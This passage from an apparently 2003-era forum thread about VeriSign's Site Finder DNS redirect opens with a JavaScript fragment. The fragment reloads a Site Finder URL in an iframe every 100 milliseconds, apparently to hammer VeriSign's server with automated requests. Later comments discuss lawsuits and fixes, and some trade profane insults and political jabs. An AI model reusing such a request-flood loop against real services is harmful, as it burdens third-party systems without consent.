fullurl = "http://sitefinder.verisign.com/lpc?url=" + url + "&host=" + host;
document.body.innerHTML= "[p]" + fullurl + "[/p]\n[iframe width='500' height='300' ID='fr' onload='restart()' src='" + fullurl + "']";
}
function restart()
{
setTimeout("renew()", 100);
}
[/script]
I was able to make it happen yesterday, but today, I'm getting failed back. I tried a web page, then tried nslookup, and even tried several of the online web-based nslookup tricks as well. Nothing.
Either everyone I tried is now blocking this, or the BIND patch has spread *unbelievably* rapidly, or they dropped the idea completely.
Anyone have info on which of these is going on?
- Give a man a fire and he's warm for a day, but set him on fire and he's warm for the rest of his life.
I'm glad you're not in charge!
autopr0n is like, down and stuff.
Simply because Trent Lott and whatsisname, the sponsor of the bill, held a press conference featuring boxes and boxes and boxes of petitions, doesn't mean that those petitions had any influence. OK, good call. But they *say* that it had an influence, right, the good congressmen flat-out say it, and I can't help agreeing that all that support must have made it just a little bit easier to vote this way ...
Maybe you're right, though. Maybe Clearchannel just forgot to send in a bribe. I bet they're real pissed off now, too. After all, the Senate just went and rolled back those new limits on radio consolidation. Now Clearchannel might have to go and buy *more* radio stations, and you know how much they hate doing that.
Thanks for making my day a little brighter.
can companies sue verisign for trademark infrigement or confusion?
for example, you have a domain acme.com. there may be a legal basis for suing verisign if let say the acme.net is not yet registered or variants such as acmee.com or acmes.com or acmecorp.com or acmeinc.com.
because it is being redirected to their site for commecial purpose, you can now argue that verisign is using your trademark to gain fees (for registration so you can have all the domain variants for yourself registered by verisign) or sue them because they are using your domain to gain revenue (due to their search.)
if they cannot be stopped from the technical perspective, a barrage of lawsuits by corporations will catch them off hand and hopefully return everything back to as it should be.
Live your life each day as if it was your last.
If the domain name isn't registered to begin with - does it matter?
If Google really cared they would fix Android Chrome to reflow text, instead of discriminating
Is this something my ISP needs to do, or do I need it on my machine?
Verisign is messing with everybody that checks for domains and is stealing my trafic, since they just recommends domains of Verisign. If you search for my domain without the brazil suffix .br, MSNs recomends my brazilian site. Verisign just steals it.
Cos you are a coward...
You come here and have a go at the guy for having a slightly different sense of humour to you and don't even have the decency to post as yourself you spineless piece of shit.
I bet you don't even get the humour in this post...
speak fucking english, you moron.
"For Atlas to shrug the creative people have to be people as greedy and self centered as Ayn Rand was"
Self centered? Certainly. Greedy? Not at all. It is not "greed" to want to dare to keep that which you strive to create.
Those who believe otherwise are probably similar to the morons who believe that Gore won the 2000 election.
It is the socialists who are both self-centered and extremely greedy.
I am no Randist, but the extreme of Randism is much more preferable to the extreme of marxism and socialism (in which the greed of the few knows no boundaries)